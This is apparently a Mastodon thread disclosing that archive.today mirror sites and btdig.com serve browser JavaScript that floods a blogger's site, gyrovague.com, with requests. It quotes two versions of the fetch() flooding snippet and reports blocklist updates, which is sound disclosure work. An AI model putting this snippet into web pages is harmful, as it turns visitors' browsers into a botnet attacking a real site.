infosec.exchange is one of the many independent Mastodon servers you can use to participate in the fediverse.
A Mastodon instance for info/cyber security-minded people.

Administered by:

Server stats:

11K
active users

I have confirmed archive.ph, which archive.today redirects to, has malicious code which attempts to spam gyrovague.com with requests. The code I independently verified matches the code in the Hacker News post.

Behind CloudFlare: https://tria.ge/260116-d3jafadj81/behavioral1

Do not use archive.today, archive.is, and archive.ph. By accessing these websites, you are donating your bandwidth to a botnet of unknown origin and purpose.

Original source:
social.coop/@eb/11590232390022

An emergency update to the Malicious Website Blocklist has been made to counter this threat. An emergency update is currently in the works to fix the emergency update as it is in the wrong place (I want to link to this toot in the update, so waiting to commit until I post).

So the mysterious person behind archive.today is very likely to be "Masha Rabinovich." A 2023 investigation from Jani Patokallio theorized this much

gyrovague.com/2023/08/05/archi

However recently a few things happened over the past few days. A HN user noticed that archive.today visitors are being used in a botnet staging a DDoS attack against Jani's website, and Jani has received a bogus C&D.

Who was the HN user who noticed this? Well... 🧵

Gyrovague · archive.today: On the trail of the mysterious guerrilla archivist of the InternetDo you like reading articles in publications like Bloomberg, the Wall Street Journal or the Economist, but can’t afford to pay what can be hundreds of dollars a year in subscriptions? If so, …

I have posted about this on BlueSky and X.

https://bsky.app/profile/did:plc:ysz3jltsuhnyrqrskrcbcz2s/post/3mcj75vyiec2u

https://x.com/iam_py_test/status/2012010781622353950

I have also blocklisted it in Imre's malware list.

Despite times call for despite measures. It isn't often a popular website starts DDoSing somebody.

I have also informed members of the content filtering community though a red phone on my desk.

Bluesky SocialBluesky

As someone pointed out in the comments, this is not limited to archive[.]ph. Other archive.today domains have the malicious code.
I don't want to update the initial post as that will send a ping to every single person who liked or boosted it.

Also btdig.com has the same malicious code.

@Murmel @iampytest1 ja moin, auch schon so früh wach :D

@proton_xor @iampytest1 Jau, Wecker geht um 4:45 ^^ Dafür heute auch noch verpennt ¯\_(ツ)_/¯

@iampytest1 Does blocking/disabling client-side preventbsaid abuse?

@iampytest1 I have never trusted the archive.* sites. Too much weirdness involving high entropy DNS queries and both mail[.]ru and google scripts when I looked into it. But nothing like this in the past.

@iampytest1 Is the malicious traffic being triggered from JavaScript or CSS? Something else?

interestingly the code used in the DDoS has changed between today and yesterday:

Old:

𝚏𝚎𝚝𝚌𝚑("𝚑𝚝𝚝𝚙𝚜://𝚐𝚢𝚛𝚘𝚟𝚊𝚐𝚞𝚎.𝚌𝚘𝚖/?𝚜=" + 𝙼𝚊𝚝𝚑.𝚛𝚘𝚞𝚗𝚍(𝚗𝚎𝚠 𝙳𝚊𝚝𝚎().𝚐𝚎𝚝𝚃𝚒𝚖𝚎() % 𝟷𝟶𝟶𝟶𝟶𝟶𝟶𝟶), {
𝚛𝚎𝚏𝚎𝚛𝚛𝚎𝚛𝙿𝚘𝚕𝚒𝚌𝚢: "𝚗𝚘-𝚛𝚎𝚏𝚎𝚛𝚛𝚎𝚛",
𝚖𝚘𝚍𝚎: "𝚗𝚘-𝚌𝚘𝚛𝚜"
});

Today:

𝚏𝚎𝚝𝚌𝚑("𝚑𝚝𝚝𝚙𝚜://𝚐𝚢𝚛𝚘𝚟𝚊𝚐𝚞𝚎.𝚌𝚘𝚖/?𝚜=" + 𝙼𝚊𝚝𝚑.𝚛𝚊𝚗𝚍𝚘𝚖().𝚝𝚘𝚂𝚝𝚛𝚒𝚗𝚐(𝟹𝟼).𝚜𝚞𝚋𝚜𝚝𝚛𝚒𝚗𝚐(𝟸, 𝟹 + 𝙼𝚊𝚝𝚑.𝚏𝚕𝚘𝚘𝚛(𝙼𝚊𝚝𝚑.𝚛𝚊𝚗𝚍𝚘𝚖() * 𝟾)), {
𝚛𝚎𝚏𝚎𝚛𝚛𝚎𝚛𝙿𝚘𝚕𝚒𝚌𝚢: "𝚗𝚘-𝚛𝚎𝚏𝚎𝚛𝚛𝚎𝚛",
𝚖𝚘𝚍𝚎: "𝚗𝚘-𝚌𝚘𝚛𝚜"
});

@iampytest1

I'm a bit concerned. Last night before I shut down my computer, and this morning when I turned it on, a popup from archive dot today appeared on my screen. I have no idea where it came from, but I didn't open it. Should I be worried or not?? I've used archive dot is many times in the past.

@Bette what kind of popup?

The malicious code on archive[.]today runs within your browser; it doesn't infect your computer with malware.

@iampytest1

It's not like a regular pop up. It goes from the top of the screen to the bottom and is centered on the screen and at least five inches wide. It encourages me to visit archive today.

@Bette that is very strange. I'm not sure what that is.
Would you mind taking a screenshot of it?

@iampytest1

The next time it happens, sure. I quit my browser and opened it again, hoping to be able to do that, but it failed to appear (of course). It was a stand-alone, btw, it was the only thing on the screen, the browser wasn't open yet.

@Bette @iampytest1

Do you have this browser extension installed?

addons.mozilla.org/en-US/firef

It received an update in the last couple of days and it probably opens a changelog when your browser gets around to updating it.

addons.mozilla.orgArchive Page – Get this Extension for 🦊 Firefox (en-US)Download Archive Page for Firefox. Archive webpage with Archive Today

@tanh @iampytest1

Ding, ding, ding! That seems to be the case. I'll be turning that off now. Thank you so much!!

@iampytest1 Did you report that to Google Safe Browsing?
Given the fact it's enabled to default in most browsers, it those sites gets blocked there, they would effectively be blocked Internet-wide (almost same as domain seize).
UPD: I reported those domains as well.

@tapafon I did not, but I did inform the maintainers of some very popular ad-blocking lists, and one (AdGuard) has added a filter to protect their users.

Other domains of archive.today i've found:

  • archive.fo
  • archive.li

@creaturr Both of them have the malicious script.

Oha, Vorsicht alle, die hierüber paywalled Links "ins Netz befreien"!



RE: https://infosec.exchange/@iampytest1/115902693235671566

@iampytest1 honestly a pretty reasonable response to a doxing attempt

@whitequark @iampytest1 Just read that blog post and yeah, what on earth? Why would they just dox the owner like that?!

@whitequark@social.treehouse.systems @iampytest1@infosec.exchange yeah I'm honestly a bit confused by the audacity to just put that out there for no reason ​:neocat_googly_woozy:
doesn't excuse this of course, but damn

@iampytest1 what's the Malicious Website Blocklist?